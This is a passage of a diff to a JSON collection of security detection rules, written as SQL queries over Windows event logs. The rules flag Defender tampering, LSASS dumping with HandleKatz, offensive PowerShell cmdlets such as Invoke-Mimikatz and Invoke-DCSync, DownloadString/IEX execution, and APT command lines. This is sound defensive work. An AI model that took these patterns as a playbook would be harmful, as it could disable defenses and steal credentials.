'%\\\\pwsh.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE 
'%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" ], - "filename": "posh_pc_exe_calling_ps.yml" + "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" }, { - "title": "Delete Volume Shadow Copies Via WMI With PowerShell", - "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", - "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", - "author": "frack113", + "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "07aa184a-870d-413d-893a-157f317f6f58", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.discovery", + "attack.execution", + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" ], - "filename": 
"posh_pc_delete_volume_shadow_copies.yml" + "filename": "proc_creation_win_susp_gather_network_info_execution.yml" }, { - "title": "Remote PowerShell Session (PS Classic)", - "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "title": "PUA - DIT Snapshot Viewer", + "id": "d3b70aad-097e-409c-9df2-450f80dc476b", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", + "author": "Furkan Caliskan (@caliskanfurkan_)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate admin usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" ], - "filename": "posh_pc_remote_powershell_session.yml" + "filename": "proc_creation_win_pua_ditsnap.yml" }, { - "title": "Tamper Windows Defender - PSClassic", - "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "title": "HackTool - HandleKatz LSASS Dumper Execution", + "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "status": "experimental", - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. 
Or set default actions to allow.", - "author": "frack113", + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE 
'%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" ], - "filename": "posh_pc_tamper_with_windows_defender.yml" + "filename": "proc_creation_win_hktl_handlekatz.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Tasks Folder Evasion", + "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "status": "test", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "author": 
"Sreeman", "tags": [ + "attack.defense_evasion", + "attack.persistence", "attack.execution", - "attack.t1059.001" + "attack.t1574.002" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_invocation_generic.yml" + "filename": "proc_creation_win_susp_task_folder_evasion.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential PowerShell Execution Via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "status": "test", + "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", + "author": "Markus Neis, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1027", - 
"attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_powershell_dll_execution.yml" }, { - "title": "Malicious PowerShell Commandlets - PoshModule", - "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "title": "OilRig APT Activity", + "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - 
"attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE 
'%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' 
ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE 
'\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE 
'%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" ], - "filename": "posh_pm_malicious_commandlets.yml" + "filename": "proc_creation_win_apt_oilrig_mar18.yml" }, { - "title": "Bad Opsec Powershell Code Artifacts", - "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "title": "Operation Wocao Activity", + "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", "status": "test", - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often 
undergo minimal changes by attackers due to bad opsec.\n", - "author": "ok @securonix invrep_de, oscd.community", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", "attack.execution", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" ], - "filename": 
"posh_pm_bad_opsec_artifacts.yml" + "filename": "proc_creation_win_apt_wocao.yml" }, { - "title": "Remote PowerShell Session (PS Module)", - "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", - "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% 
